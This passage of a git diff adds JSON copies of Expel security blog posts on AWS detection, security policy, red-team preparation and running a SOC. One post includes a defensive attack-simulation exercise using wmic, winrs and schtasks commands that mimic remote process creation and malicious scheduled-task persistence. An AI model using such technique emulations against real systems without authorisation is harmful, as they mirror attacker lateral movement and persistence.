It\u2019s rapidly becoming a more expensive line item in a Chief Information Security Officer\u2019s (CISO\u2019s) budget, and we can expect new and innovative approaches to risk assessment to emerge. As companies look to secure cyber insurance, they\u2019ll apply additional pressure on their supply chain to provide demonstrable proof that their downstream suppliers are able to respond effectively and in near real-time to cyber incidents\u2014incidents that have the potential to affect the company\u2019s own response (like when Toyota halted production following an attack on a supplier earlier this year). \u2013 Chris Waynforth, General Manager, EMEA 2. Everything old is new again, as attackers bypass MFA by targeting the user. Since \u201csecure by default\u201d configurations have become more common, we\u2019re going to see attackers investing more of their time targeting the user. Our security operations center (SOC) saw this trend in the third quarter (Q3) of 2023, as users increasingly let attackers in by approving fraudulent multi-factor authentication (MFA) pushes to enact business application compromise (BAC) attacks. In fact, MFA and conditional access were configured for more than 80% of the cases where the attackers were successful in Q3. (More on this in our quarterly threat report recap for Q3.) In theory, none of these hacks should have succeeded, but the attacker tricked users into satisfying the request by hitting them with a barrage of MFA notifications until they eventually accepted one. For some organizations, this shift in attacker strategy will drive adoption of technologies like Fast Identity Online (FIDO). For others, especially those that struggled to implement MFA in the first place, it won\u2019t. For those companies that do button up effectively, attackers will turn back to targeting the infrastructure and applications. \u2013 Matt Peters, Chief Product Officer 3. CISOs will have to learn to frame security risk as a business factor. Company boards are having broader conversations around risk and as a result, security leaders will need to translate risk into business outcomes enabled by security investment. As macroeconomic conditions drive changing priorities, security leaders will need to adopt a more framework-based approach to demonstrate return on investment (ROI) for their boards. Security leaders unable to make the connection to business outcomes will struggle career-wise, struggle for budget, and struggle for relevance in the business decision-making processes of their organization. \u2013 Dave Merkel, Chief Executive Officer, Co-founder 4. Macroeconomic impacts will force companies to scrutinize security spend. For many security leaders, the changing macroeconomic climate will shift the focus toward cost-conscious decisions and the consolidation of cybersecurity investments. Until now, companies have taken a \u201cmore is more\u201d approach to cybersecurity products and services, tacking on tools to their arsenals to combat the growing threat landscape. But next year, they\u2019ll face tighter budgets and the need to prioritize. This consolidation can be a good thing, as it will force focus on quality outcomes, and a move away from the model of loosely integrated solutions that simply deliver more alerts. Companies have increasingly turned to managed detection and response (MDR) providers to help manage this, and that trend is only going to continue. Many security leaders recognize it can be more effective and economical to optimize their operations with outside experts. For those that do continue to handle this internally, they\u2019ll be pressured to drive cost efficiency, and with greater urgency than in previous years. \u2013 Greg Notch, Chief Information Security Officer 5. The available cybersecurity talent pool is about to get a lot bigger. As tech companies are forced to enact layoffs because of the macroeconomic climate, more professionals with technical skills will enter the job market. For companies fortunate enough to still be in the position to hire, this will present a unique opportunity to select from an increased talent pool of skilled technical workers\u2014at a time when the cybersecurity \u201cskills gap\u201d still makes the headlines daily. Not to mention, the diversity that comes from an expanded hiring pool leads to organizations that are more successful at attracting and retaining employees. \u2013 Dave Merkel, Chief Executive Officer, Co-founder At the beginning of this year, we took a deep dive into the data our SOC ingested from the previous year to predict what was in store for 2022 with our first-ever Great eXpeltations annual report. Keep an eye out for the next iteration of this report, full of year-end analysis and predictions like these, coming in January 2023." +} \ No newline at end of file diff --git a/5-pro-tips-for-detecting-in-aws.json b/5-pro-tips-for-detecting-in-aws.json new file mode 100644 index 0000000000000000000000000000000000000000..4ce87eafde1ebf97ed6d19b64d0395e1523a31f5 --- /dev/null +++ b/5-pro-tips-for-detecting-in-aws.json @@ -0,0 +1,6 @@ +{ + "title": "5 pro tips for detecting in AWS", + "url": "https://expel.com/blog/5-pro-tips-for-detecting-in-aws/", + "date": "Feb 15, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG 5 pro tips for detecting in AWS Tips \u00b7 3 MIN READ \u00b7 BRANDON DOSSANTOS, BRITTON MANAHAN, SAM LIPTON, IAN COOPER AND CHRISTOPHER VANTINE \u00b7 FEB 15, 2022 \u00b7 TAGS: Cloud security / MDR / Tech tools Detection and response in a cloud infrastructure is, in one word: confusing. And untangling the web of Amazon Web Services (AWS) can be daunting, even for the most experienced among us. So where do you start? Sometimes better security practices begin with basic, but critical, changes. In this post, we\u2019ll walk you through five pro tips for threat detection in AWS so you can free yourself from a bunch of alerts and get the space back to focus on the alerts that matter most. Prioritize security as part of your culture\u2026 like, yesterday News flash: your security team shouldn\u2019t be the only people concerned about security \u2014 just ask your colleague that fell for yet another phishing scam. If you want a security program that works, it needs to be ingrained into all parts of your business and culture. That means educating all of your users so they understand security best practices, and keeping these best practices fresh in their minds with consistent, office-wide trainings. When security is baked into your culture, frameworks, and solutions, it becomes a day-to-day priority. Set goals along the way to see what does and doesn\u2019t work for your org. Changing the way employees think and feel about security might be an incremental process, and that\u2019s okay! At the end of the day, every employee should at least understand the importance of security, and your Chief Information Security Officer (CISO) should always have a seat at the table. Giving your CISO insight into business decisions upfront helps keep security a top line priority for your whole org from the beginning, so that you\u2019re not playing catch-up down the line. Forget what you know about \u201cnormal\u201d What\u2019s \u201cnormal\u201d anyway \u2014 right? Every AWS environment is unique, which means what\u2019s usual in one environment can be suspicious in another. Before you can automate or write detections, you need to know what\u2019s exposed to the outside world in your cloud environment, take a serious look at container security, and understand what normal looks like in your environment. If you spot unusual user or role behavior, dig deeper. Look at it through a wider lens over the past 24 hours. Does anything look interesting, like multiple failed API calls? Understanding what\u2019s the norm in your environment helps you efficiently tune alerts (and helps tune out that security engineer who\u2019s constantly running penetration tests). Automate, automate, automate Automating elements of your security program helps with consistency, but do it strategically. Start by asking, \u201cWhat problem are we trying to solve?\u201d and work from there to free up resources and speed up time-to-detect. All AWS services are available as APIs, so you can automate just about anything. Know which servers are mission critical and use automation to adjust those alerts for impact so your team doesn\u2019t miss anything. Not to mention, it might help your security team sleep through the night without waking up in a cold-sweat because an alert slipped through the cracks. Lean on logging for better context clues It\u2019s hard to tell a story and determine what happened if there\u2019s no [cloud]trail to follow. Your detections are only as good as your logging. Make sure CloudTrail is logging all of your accounts, not just certain regions, and that no one is tampering with your logging (like turning it off entirely \u2014 yikes). Then, use CloudTrail as an events source to find anomalous or aggressive API usage. We recommend linking MITRE ATT&CK tactics with AWS APIs to filter for the most interesting activity. By the way, here\u2019s a mind map for AWS investigations that lays out some preliminary tactic mapping to make this part easier. Take your time laying the breadcrumbs (re: make sure your logging is up to par). It helps your detections and ultimately speeds up triage and investigation after your team sees an alert. Get back to the basics We get it \u2014 for an industry vet, it can be easy to overlook the basics. But when misconfigurations are a leading vector behind attacks in the cloud, it\u2019s important to make sure you\u2019re brushing up on best security practices in your AWS environment. It sounds simple, but the best way to understand AWS to write detections \u2014 and the key to red team research \u2014 is learning the basics of Identity and Access Management (IAM). Similarly, when thinking about container security, make sure you\u2019re securing every point an attacker can infiltrate. Covering the basics, from IAM to parts of a container, helps you protect your environment and improve your detection writing. See? Simple. Want to know more about some or all of these tips? We did a deep dive into these tips and all things detecting in AWS during Expel\u2019s AWS Detection Day. You can check out each of our session videos here . Still have questions? We\u2019d love to chat!" +} \ No newline at end of file diff --git a/5-tips-for-writing-a-cybersecurity-policy-that-doesn-t-suck.json b/5-tips-for-writing-a-cybersecurity-policy-that-doesn-t-suck.json new file mode 100644 index 0000000000000000000000000000000000000000..d081f7247e3ff6942007ff0483e32ce9c767c712 --- /dev/null +++ b/5-tips-for-writing-a-cybersecurity-policy-that-doesn-t-suck.json @@ -0,0 +1,6 @@ +{ + "title": "5 tips for writing a cybersecurity policy that doesn't suck", + "url": "https://expel.com/blog/5-tips-writing-cybersecurity-policy-doesnt-suck/", + "date": "Sep 17, 2019", + "contents": "Subscribe \u00d7 EXPEL BLOG 5 tips for writing a cybersecurity policy that doesn\u2019t suck Tips \u00b7 4 MIN READ \u00b7 JOHN LAWRENCE \u00b7 SEP 17, 2019 \u00b7 TAGS: CISO / Framework / How to / Planning Ask anyone who\u2019s worked in cybersecurity for any length of time and I\u2019ll bet you they\u2019ve been asked to draft or contribute to a cybersecurity policy for their org. Creating a \u201cpolicy\u201d sounds simple, but those same people who\u2019ve been tapped to contribute will tell you that it\u2019s not easy. That\u2019s because enterprise-level cybersecurity policy is still a new thing and with new things comes many different interpretations and implementations. It\u2019s also not always easy for policy writers to work with other teams to find that sweet spot where security needs and business needs are balanced \u2026 and without slowing employees down, of course. But drafting a comprehensive cybersecurity policy is critical for enforcing guidelines and reducing liability. Here are some pro tips on what goes into a good cybersecurity policy and how you might use these tips in your own org. What does policy really mean? Before putting pen to paper, you\u2019ve gotta understand what \u201cpolicy\u201d means in the first place. There are lots of terms that get tossed around when a policy is being created, but they\u2019re not interchangeable (even though some people use them that way). Here are a couple terms you might hear during a discussion about policy, along with their definitions: Term Definition Policy What it is: A plan or course of action to guide future decisions. What it answers: What to do and why to do it. Procedure What it is: Describes the exact steps for a policy to be executed. What it answers: Who does what, when they do it, how they do it and what to do specifically. Audit What it is: Measures against a set standard. An objective measurement of security. Common standards include NIST , PCI, IEC 62443. What it answers: Are we meeting our goals? Are we following our policies? Assessment What it is: Measures against the experience of others. A subjective measurement of security. What it answers: Does it seem like we are meeting our goals? How do we feel about how the policy is being followed? Now that we\u2019ve got the basic definitions out of the way, I\u2019ll use them in an example to see how they might actually be used in a conversation about your own org\u2019s policy: \u201cWe\u2019re creating a new cybersecurity policy for the company. This policy will outline goals to guide us in our most important cybersecurity tasks. The policy will state that we\u2019ll conduct an assessment every three months to verify employees are following policy and procedure and an audit every year to ensure that we\u2019re meeting PCI compliance . Further, procedures will be made to provide guidelines and steps on accomplishing the goals set forth by the policy.\u201d Pro tips for writing a policy that doesn\u2019t suck The Valve Employee Handbook , Microsoft Standards of Business Conduct and even the US Constitution \u2014 all of these works come from large organizations and at their core is strong policy writing. What are some of the most important rules of policy writing these works use that we can use as we\u2019re doing our own drafting? The stuff you decide to include in your cybersecurity policy will be unique to your org \u2014 and companies\u2019 needs when it comes to cybersecurity vary so widely that we can\u2019t try and cram all of those nuances into a single blog post. But all good cybersecurity policies do share some similar traits. After chatting with lots of Expletives who\u2019ve written and contributed to countless policies over the course of their careers, here\u2019s the final list of pro tips we came up with to help you as you\u2019re drafting your own: Know your business goals. Sounds obvious, but it\u2019s always good to gut check the direction of your policy against the broader business goals. If you\u2019re not aligned with the same stuff the business cares about, you run the risk of cybersecurity being seen as a cost center or deadweight on the company \u2014 not exactly a position you want to be in. Michael Sutton goes into greater depth here on how to create or grow relationships with the other execs on your team so that you\u2019re all on the same page when it comes to goals. Make it practical. Of course you want to create the ideal policy \u2014 but make sure the guidelines you\u2019re creating are realistic for both your users and your own security team (if you\u2019re lucky enough to have one). A common example of an impractical policy is one that includes lots of mandates around sensitive data protection. In these policies, orgs might say things like \u201call confidential data must be marked\u201d and \u201call external transmission of data must be encrypted.\u201d Sure, it sounds good on paper, but your users won\u2019t do this because it\u2019s a headache for them to do manually. Instead, you could ask employees to only mark the data when it\u2019s leaving your org, and then have tech in place to do the secure transfer automatically. Setting realistic expectations for users and your own team gives you a much better chance that the rules you set forth will be followed. Make it applicable. Make sure the policy you\u2019re writing is applicable to your org. For example, every so often a policy will get caught up covering too many specific security examples and how to resolve them. This turns the policy from a document providing direction to a document that\u2019s applicable in only a few specific circumstances. And when a policy is not always applicable people start to ignore it. Be concise. You\u2019re not drafting the Magna Carta here. Keep the policy short and to the point so that employees will actually read it. There\u2019s sometimes a tendency to include a bunch of boilerplate language that \u201call policies must have\u201d \u2014 but don\u2019t do that. The longer the policy, the less likely your users are to internalize it. Write in plain English. All of us cybersecurity folks love speaking in APTs, CVEs, XSS, and LEET (sometimes). But remember that Mike in finance and Karen in sales don\u2019t \u201cspeak\u201d cybersecurity. Write your policy in everyday language so that anyone in your org \u2014 regardless of their knowledge level about cyber threats \u2014 can understand it. Got a draft? Here are your next steps Once you\u2019ve got a draft of your policy, a great way to determine whether your policy passes the sniff test in the five areas mentioned above is to share it with others and ask for feedback. (Bonus: This is a great way to socialize the policy with your executive team and make some new friends.) There are also numerous resources you can review as you\u2019re drafting your policy that might help you get a better understanding of what a policy should and shouldn\u2019t cover \u2014 take a look at NATO CCDCOE (NATO Cooperative Cyber Defence Centre of Excellence), NCCoE (National Cybersecurity Center of Excellence) or the NIST CSF (National Institute of Standard and Technology Cybersecurity Framework) for starters. With that, you\u2019re well on your way to becoming the policy whiz kid of the office \u2026 don\u2019t let it all go to your head. John Lawrence is a Security Operations Center intern at Expel. Check out his LinkedIn profile ." +} \ No newline at end of file diff --git a/6-things-to-do-before-you-bring-in-a-red-team.json b/6-things-to-do-before-you-bring-in-a-red-team.json new file mode 100644 index 0000000000000000000000000000000000000000..fb7e5cccd41cacc24770fd426b8d2b7d52fd21c5 --- /dev/null +++ b/6-things-to-do-before-you-bring-in-a-red-team.json @@ -0,0 +1,6 @@ +{ + "title": "6 things to do before you bring in a red team", + "url": "https://expel.com/blog/6-things-to-do-before-you-bring-in-red-team/", + "date": "Jul 8, 2020", + "contents": "Subscribe \u00d7 EXPEL BLOG 6 things to do before you bring in a red team Tips \u00b7 6 MIN READ \u00b7 JON HENCINSKI, TYLER FORNES AND DAVID BLANTON \u00b7 JUL 8, 2020 \u00b7 TAGS: How to / Managed detection and response / Managed security / Planning / SOC Remember that time we almost brought down our point of sale environment on a busy holiday weekend because we thought the red team was a real bad guy? Whoah, that would\u2019ve been bad. But we didn\u2019t because we did our prep work. The SOC had a bat phone to the red team and was able to quickly verify the evil \u201c whoami \u201d and \u201c net \u201d commands were from the red team. Crisis averted. Red team assessments are a great way to understand your detection and investigative capabilities, and stress test your Incident Response (IR) plan . But good intentions can lead to bad outcomes if you don\u2019t do your prep work. A red team will generate activity that looks similar to a targeted attack (cue the adrenaline). So a little planning goes a long way. Here\u2019s six things you should do before taking on the red team. 1. Start with objectives Start here. Get clear on your objective(s) to set the direction of the assessment and define the rules of engagement. Worried that an attacker could gain access to a segmented part of your network? Or perhaps you\u2019re worried that an attacker could compromise credentials and spin up resources in Amazon Web Services (AWS)? Clear objectives help everyone. Business-focused objectives usually look like: Break into a segmented part of your network Obtain a VIP user\u2019s credentials (CEO, CTO, IT Administrator, etc.) Access/exfiltrate customer data While these drive the overall theme and end-game for the red team, there\u2019s a set of objectives that often surround the organization\u2019s ability to respond as well. From a defensive perspective some reasonable objectives are: Assess detection capabilities and identify gaps Stress test response and remediation capabilities Assess investigative capabilities in Windows and Linux environments Assess investigative capability in the cloud Goals bring purpose to the assessment. Purpose that should be measured along the way. Some key questions we measure are: How long did it take us to spot the red team? At what phase in the attack lifecycle did we spot them? How long did it take us to remediate? What challenges did we encounter when remediating? Do we need to update our response playbooks? What didn\u2019t we detect? Document these to be actioned later. Were there investigative challenges that prevented us from answering key questions? Document these to be actioned later. 2. Review your IR plan with the team It\u2019s so important to build muscle memory around your IR process before a bad thing happens. This way everyone knows what to do, including how to communicate. One of the biggest challenges is getting over the \u201cadrenaline rush\u201d that comes with responding to an incident. Panic will happen, and chaos will ensue the first couple of times through it. But as everyone gets comfortable with the process and goes through some of the unknowns together, the response process will become a well-oiled machine that everyone is ready for instead of afraid of. From an operator\u2019s perspective, we\u2019re a huge fan of running threat emulations for our analysts. These are miniature versions of a red team assessment that help train our analysts in responding to a specific threat, or testing our own response process. There\u2019s a lot of fun to be had here for a blue-teamer who is red curious (remember rule #1 is that objectives are key). For the broader org, we\u2019re biased, but \u201c Oh Noes \u201d is a great place to start if you need some help organizing a simulated walk-through of your IR plan (and have some fun in the process). 3. Emphasize remediation We agree with Tim MalcomVetter . The emphasis of a red team should be response. Talk about remediation ahead of time. Ask hard questions like, \u201cwhat would we do if that account was compromised?\u201d Pro-tip: Know ahead of time who in your org to contact for infrastructure questions, service accounts, etc. Sometimes knowing who to call is the biggest hurdle. Plan your response, know who to contact, and then stress test your plans. If your SOC doesn\u2019t have a lot of reps responding to red team activity, remediation may happen without considering business impact. Consider the following: The red team appears to be using the account \u201csql_boss\u201d to move laterally. We should disable that account. Red teams love service accounts. Service accounts typically have privileged access and can be tough to reset. In this scenario, disabling the account \u2018\u201c sql_boss \u201d would cause the red team some pain. But what else would it do? What does that account run? How is it used? Is it responsible for the backend of a business critical application? Should we disable this account? Can we disable this account right now? There\u2019s some not-so-funny stories we can tell here about how this oversight has caused major pain for some organizations. But in essence the major theme is: Do your homework, plan your response and talk about it ahead of time. 4. Set expectations Your blue team just spotted a bad guy moving laterally via WMI to dump credentials on a server? Great find! Will you let them know it\u2019s an authorized red team? There\u2019s many theories to appropriately assess the response to a red team. Some organizations prefer not to tell their defenders, some prefer to operate more openly in the purple team model. In any regard, there will be a moment between detection of the initial threat and the recognition that this is authorized red team activity that you\u2019ll want to plan for. Your SOC will think this is a real threat, and your playbooks for a real threat will (hopefully) be followed. Consider that when you make the decision to include/exclude knowledge of the assessment from key stakeholders in your security organization. One way to think about this is: \u201cat 2am who/how many will be woken up to respond, and how soon in our IR plan do things become a risk to the business?\u201d Our take: The more people in the know, the better. Don\u2019t gas the team responding to an authorized assessment. Save some capacity and energy for the real thing (we\u2019ve seen the real thing happen at the same time as the assessment). 5. Chat with your MSSP/MDR Use an MSSP or MDR? Chat with them. Understand rules of the road for responding to red team activity. It\u2019s likely one of your red team goals includes assessing your MSSP/MDR. That\u2019s great! But understand what you can expect before you get started. At Expel, we like to treat red team engagements as a real threat to exercise our analysts\u2019 investigative muscle, and also showcase our response process. This helps build confidence between us and our customers. It also helps them understand how we will communicate with them (slack, email, PagerDuty) when there\u2019s an incident in their environment. Additionally, this also showcases our analysts\u2019 investigative mindset, including a full report to show the detail of our response and the thoroughness of our investigation. Now, as mentioned above there\u2019s a cost to responding to a red team exercise. Response is time-consuming and analyst resources are extremely valuable. We believe that showcasing the initial response is important, and the extended response can wait. That means if a red team is detected and confirmed at 2am, let everyone go back to bed and pick up the response during normal business hours. For red team response, we operate M-F 9am-5pm and will continue to chase new leads for two business days before delivering a final report. That report is comprehensive, and includes everything our normal critical response would contain, but everyone is much happier at the end of the day when our off-hour energy is saved for the real thing. 6. Have a bat phone to the red team Your MDR or SOC just spotted activity they believe is the red team. Prove it with evidence. Don\u2019t assume! Call them. Show them. Verify it\u2019s the red team using evidence. You would be surprised at how often the lines get crossed when the actions taken during an assessment don\u2019t necessarily line up with what was documented/in-scope. However, the quicker these actions can be confirmed, the happier everyone is when they aren\u2019t related to the actions of an actual threat. Most SOCs will not stand down until this is confirmed, and we\u2019ve sometimes waited more than 12 hours to get confirmation that something we identified is related to an authorized test. That\u2019s a lot of energy expended on both ends. Have cell phone numbers, Zoom bridges, etc. before you get started. Always have a deconfliction process on-hand prior to launching the assessment. This will save a lot of your team\u2019s time and energy when the red team gets in. Parting thoughts Red team assessments come in all shapes and sizes, and we believe that they are essential for understanding not only the security posture of an organization\u2019s overall response readiness. If you\u2019re in a position to influence how a red team assessment is organized, we encourage you to talk about these points not only internally but with the red team you have chosen to carry out the assessment as well as the SOC/MSSP/MDR you will be relying on for defense. Some quick planning and expectation setting can prevent a lot of pain and create an overall better engagement for everyone involved!" +} \ No newline at end of file diff --git a/7-habits-of-highly-effective-remote-socs-expel.json b/7-habits-of-highly-effective-remote-socs-expel.json new file mode 100644 index 0000000000000000000000000000000000000000..ef80d3ded961f0512bd4fd0eafb5d55c48aec0de --- /dev/null +++ b/7-habits-of-highly-effective-remote-socs-expel.json @@ -0,0 +1,6 @@ +{ + "title": "7 habits of highly effective (remote) SOCs - Expel", + "url": "https://expel.com/blog/seven-habits-highly-effective-remote-socs/", + "date": "Mar 25, 2020", + "contents": "Subscribe \u00d7 EXPEL BLOG 7 habits of highly effective (remote) SOCs Security operations \u00b7 5 MIN READ \u00b7 JON HENCINSKI \u00b7 MAR 25, 2020 \u00b7 TAGS: Employee retention / Managed detection and response / SOC Last week, along with many other businesses, we moved to 100 percent remote work as a company. That included our 24\u00d77 SOC. Expel\u2019s CEO and co-founder, Merk, shared his thoughts on some of the things he witnessed during our shift to an all remote workforce, but I wanted to share some of the changes we made to keep our SOC highly effective in this new setup. Security operations is a team sport at Expel. One of our SOC guiding principles is this: teamwork makes the dream work. It\u2019s simple: great outcomes happen when people work together . But as of last week, our SOC analysts are no longer sitting together. It\u2019s a change I knew that would require us to adapt a bit. Because in order to maintain the texture of the team in a completely remote setting we\u2019d need to commit to a new set of daily habits \u2013 seven in fact, to keep our (remote) SOC highly effective. To be candid: It\u2019s a big change for us and we\u2019re still adjusting. You may be going through something similar right now too. Or you and your SOC team may consider yourselves veterans of an all-remote setting. That\u2019s great too. Now we\u2019re all in the same boat. We\u2019ll share what\u2019s worked for us (so far) and we\u2019d love to hear what\u2019s worked for you too. 1. Prioritize video conferencing Workplace camaraderie and trust are key ingredients of an effective SOC. Trust brings safety and camaraderie adds a sense of \u201ctogetherness.\u201d We trust each other to operate in the best interest of achieving our goal (protecting our customers and helping them improve) and to work with a \u201cwe\u2019re in this together\u201d mentality. We need to maintain and nurture these key ingredients in an all-remote setting. But how? Queue the SOC party line. The SOC party line is the name of our Zoom meeting that\u2019s open 24\u00d77 for the team. Instead of walking onto the SOC floor, our analysts start their day by joining this Zoom meeting. While we\u2019re no longer able to sit next to each other we can be with each other. It matters. We\u2019re emulating the texture of the SOC floor by staying connected via Zoom and maintaining our sense of \u201ctogetherness.\u201d And yes, there\u2019s an endless pursuit to find a funny Zoom virtual background . (Side note: Security is serious business. We have the privilege of helping organizations manage risk. We take our work very seriously but don\u2019t take ourselves too seriously. It\u2019s okay to find the bad guys and have fun while doing it.) 2. When in pursuit: To the breakout room! While our 24\u00d77 Zoom meeting, aka the SOC party line, emulates the SOC floor and brings us together, pursuing threats and coordinating response in this main Zoom meeting wouldn\u2019t yield the precise, coordinated response we\u2019re seeking. Too many cooks in the kitchen. Instead, as work enters the system and the team spots activity that warrants investigation or follow-up, the lead investigator spins up a Zoom breakout room and invites the necessary resources required to run the item to ground. As an individual contributor you\u2019re provided with a virtual conference room with a clear goal and objective. As a manager, you have a clear understanding of current utilization based on the number of folks in the main Zoom room versus breakout rooms. You\u2019re enabling a highly coordinated response and have a clear line of sight on capacity. A win-win. 3. Emphasize empathy Empathy is a core competency for leaders. I personally believe that no other skill makes a bigger difference than empathy when it comes to leadership. Simon Sinek agrees with me on this one. And now more than ever, during these stressful times, we need to emphasize empathy. We\u2019re all going through something significant right now. It\u2019s okay to acknowledge that and talk about it with one another. As a SOC management team, we\u2019re spending more time with our people, not less. And most of our 1:1s right now are centered around how our folks are doing and what else we could be doing to set them up for success in this all-remote setting. We listen really hard and most importantly we let them know we\u2019ve got their back. Pro tip: Empathy builds trust. And as you already know, trust is a key ingredient to an effective SOC. 4. Be transparent about quality We\u2019re doing everything we can to make our shift to a remote SOC seamless for the team. But we\u2019re also being super transparent about the quality of our work output. Has our quality gone down as a result of this change? I wrote about our SOC quality program in a previous post , but as a quick recap: we use a quality control (QC) standard, Acceptable Quality Limits (AQL), to tell us how many alerts and incidents we should review each day. We then randomly select a number (based on AQL) of alerts, investigations and incidents and review them using a check sheet. We send the results to the team using a Slack workflow . Here\u2019s an example: Reviewing the results with the team lets us know how we\u2019re doing. It lets us know where we\u2019re having problems so we can adjust and improve. And no, we never expect perfection. 5. Over-communicate This one is a bit obvious but it\u2019s worth stating. Since we\u2019re no longer working alongside each other, effective communication is crucial. And working in an all-remote setup may mean more distractions for some folks, not less. We\u2019re emphasizing empathy and listening really hard to learn what these distractions are for the team and landed on the need to over-communicate . Repeat important messages in team meetings and 1:1s. In our SOC, \u201cI don\u2019t know\u201d or \u201cI\u2019m having difficulty understanding that\u201d is always an acceptable answer to a question (If you\u2019re not testing for candor in your interview process you totally should be, by the way). Bottom line: remote work may mean more distractions. Over-communicate like your team depends on it. 6. Seek out fun In these stressful times, not only is it okay to have fun \u2026 but you should seek it out for your team. We\u2019re still finding our way here a bit, but we\u2019ve experimented with happy hours, coffee breaks and book clubs all over Zoom (don\u2019t worry, we\u2019re always watching). The digital happy hour has been the biggest hit so far but we\u2019re still coming up with new ideas. If you don\u2019t have Zoom, Skype, Google Hangouts, FaceTime and Facebook messenger are all good alternatives. Seeking out fun for your team is a great way to take care of them. You\u2019ll reduce stress and build camaraderie. 7. Test, learn, iterate Completely remote work may be our new normal for a while. Do I think the adjustments we\u2019ve made are all of the right moves? Nope. But we\u2019ll continue to test new things, learn from our mistakes and iterate our way to an even more successful remote setup. We\u2019re never afraid to ask: Is there a better way to do this? We\u2019re always trying to learn and improve. Parting words We\u2019re still getting adjusted to our all-remote setup but we\u2019ve landed on some things that work and wanted to share them with you. We\u2019ll continue to learn and improve, as we always do, but I\u2019d love to hear from you if there are daily habits you and your team practice that make your remote SOC highly effective. Finally, we\u2019re all going through something significant right now. It\u2019s okay to acknowledge that and talk about it. Emphasize empathy with your team and the people around you. Listen really hard. Prioritize effective communication. Over-communicate. And try to have a little fun while doing it." +} \ No newline at end of file diff --git a/7-habits-of-highly-effective-socs.json b/7-habits-of-highly-effective-socs.json new file mode 100644 index 0000000000000000000000000000000000000000..6a5e292161e639b2fc0866beb01fdeb71faebe40 --- /dev/null +++ b/7-habits-of-highly-effective-socs.json @@ -0,0 +1,6 @@ +{ + "title": "7 habits of highly effective SOCs", + "url": "https://expel.com/blog/7-habits-highly-effective-socs/", + "date": "Nov 5, 2019", + "contents": "Subscribe \u00d7 EXPEL BLOG 7 habits of highly effective SOCs Talent \u00b7 6 MIN READ \u00b7 JON HENCINSKI \u00b7 NOV 5, 2019 \u00b7 TAGS: Employee retention / Managed detection and response / Managed security / Planning / SOC Before I talk about effective SOCs that run like well-oiled machines, let\u2019s get one thing straight. SOC isn\u2019t a dirty word. But I totally understand the negative connotation and that\u2019s exactly why I\u2019m writing this post. Alert fatigue is real , repetition leads to exhaustion and those two things in tandem create an environment ripe for analyst burnout . I get it. Here\u2019s the thing: When built right, a job working in a SOC can be so much fun, not to mention you get the learning and experience you thought you signed up for. Since launching our 24\u00d77 service almost two years ago we\u2019ve experimented a ton, learned a bunch, and through a lot of iteration landed on some habits \u2014 seven, in fact \u2014 that we believe help us \u201cSOC\u201d the right way at Expel. If you\u2019re working in or managing a SOC with a ton of turnover \u2014 or just want tips on how to shape an effective and more productive team \u2014 here are seven habits to adopt right now. 1. Have a clear mission and guiding principles Get explicit about the mission and your culture. At Expel, the SOC\u2019s mission is to protect our customers and help them improve. The mission is centered around problem solving and being a strategic partner for our customers. Notice that there are zero mentions of looking at as many security blinky lights as possible. That\u2019s intentional. Take it a step further and create some guiding principles. Guiding principles define what you as a team believe in and how you operate together. Here are some (but not all) of the guiding principles in the Expel SOC: Teamwork makes the dream work. Service with passion is our competitive advantage. We embrace positive change. Articulating guiding principles is the first step in creating a SOC culture that you can turn into your competitive advantage. Security tech and process are easily replicated but culture is hard to copy. 2. Prioritize learning Our analysts love to learn new things; it\u2019s even one of the traits we hire for. One thing that we\u2019ve learned in building out our program is that the best way to foster improvement is to combine this love of learning with a collaborative \u2014 not adversarial \u2014 approach. The best example of this is how we use attack simulations to help our team learn new techniques. During these, we have to celebrate progress and opportunities to learn \u2014 it doesn\u2019t take much to make someone feel foolish and have that metastasize into a reluctance to try a new thing or stretch a new skill. If you don\u2019t run attack simulations regularly, start building them into your schedule. But don\u2019t overthink it. You can run one right now in eight simple steps: Talk to the team and given them background so they don\u2019t feel ambushed. Open a PowerShell console. Run wmic /node:localhost process call create \u201ccmd.exe /c notepad\u201d from your PowerShell console to simulate remote process creation using WMI. Run winrs:localhost \u201ccmd.exe /c calc\u201d from your PowerShell console to simulate remote process creation using WinRm. Finally run schtasks /create /tn legit /sc daily /tr c:users appdatalegit.exe to simulate the creation of a malicious Windows scheduled task. Interrogate your SIEM and EDR. Talk about it as a team. Find ways to improve. Want to run more sophisticated simulations? Here\u2019s our threat emulation framework along with an example of how to simulate an incident in AWS . 3. Empower the team Analysts want to spend time finding new things, pursuing quality leads and working with people to solve complex problems \u2014 not chasing the same false positive over and over again. Trust the team to filter out the noise and then enable them to do so. How did we build this capability at Expel? We took the DevOps processes used by our engineering teams and adapted them to detection deployment. Here\u2019s a high-level overview of what this looks like: We manage our detection rules using GitHub . We have unit tests for every detection (just like you would expect of code). We use CircleCi to build our detection packages. During the CircleCi build process, we apply linting and perform additional error checking. If a CircleCi build fails we\u2019ll automatically fail the PR so an analyst knows some additional tweaks are required. We create error codes that are easy to understand. We use Ansible to deploy new detection packages. Now an analyst can deploy a new detection package at any time as long as the content passes automated tests and has been peer-reviewed. Here\u2019s how this plays out in practice. @subtee just tweeted about a new remote process execution technique \u2026 An analyst creates the rule in GitHub and submits a new PR. That PR is picked up by CircleCi, linted and checked for errors. Assuming all goes well, the PR is marked as \u201call checks passed.\u201d The analyst requests peer review. The detection package is deployed using Ansible. Everyone\u2019s happy. Empower the team to tackle false positives and write rules to find new things. Give them control of the end-to-end system and back them up with good error checking. In doing so, your team members will feel more connected to their work and the mission. 4. Automate SOC work can be repetitive. Automation FTW! But what should you automate? Decision support is a great place to start. What\u2019s decision support? In our context, decision support is all of the automation, contextual enrichment and user interface attributes that make our analysts more effective in answering the following question: \u201cIs this a thing?\u201d How does this play out at Expel? As part of our integration with Office 365 we collect signal and generate alerts when accounts are compromised or user activity doesn\u2019t seem quite right. Investigating patterns of user authentication behavior can be a tedious task when done manually \u2026 but the good news is that it\u2019s a series of repeated steps that can be automated. Take a look at this example where, with the help of some automation, we\u2019re able to quickly review 30 days of login activity based on IP address and user-agent combinations: Automate the repetitive tasks so the team can focus their efforts on making important decisions versus clicking buttons. 5. Use a capacity model Understand your available capacity (AKA analyst hours) and utilization. Are you consistently exceeding your available capacity? Is there always way more work to do than your people can handle? If so, cue the burnout. If capacity modeling is new to you, that\u2019s okay. There are plenty of resources available to help get you started. Bottom line: Know your capacity utilization. If you discover that your team is oversubscribed, you\u2019ll need to act fast. 6. Perform time series analysis I agree with Yanek\u2019s philosophy here. Effective managers are able to look out into the future and, with reasonable certainty, predict what needs to change today . I think effective management is centered around asking the right questions and using data to answer them. You already know that alert fatigue leads to burnout. As 